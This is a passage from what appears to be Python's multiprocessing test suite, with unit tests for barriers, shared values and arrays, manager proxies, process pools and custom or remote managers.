self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
